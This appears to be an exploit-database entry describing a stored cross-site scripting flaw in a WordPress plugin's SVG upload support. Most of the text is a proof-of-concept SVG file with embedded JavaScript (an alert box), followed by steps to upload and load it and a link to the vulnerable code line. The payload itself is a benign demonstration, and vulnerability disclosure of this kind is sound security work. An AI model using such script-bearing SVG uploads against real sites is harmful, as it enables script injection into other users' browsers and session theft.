Share
## https://sploitus.com/exploit?id=WPEX-ID:2E0BAFFB-7AB8-4C17-AA2A-7F28A0BE1A41
Upload an SVG with the following markup:

```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS");
  </script>
</svg>
```

Load the SVG and see the XSS.

Code reference:
https://plugins.trac.wordpress.org/browser/webp-svg-support/trunk/core/bootstrap.php#L111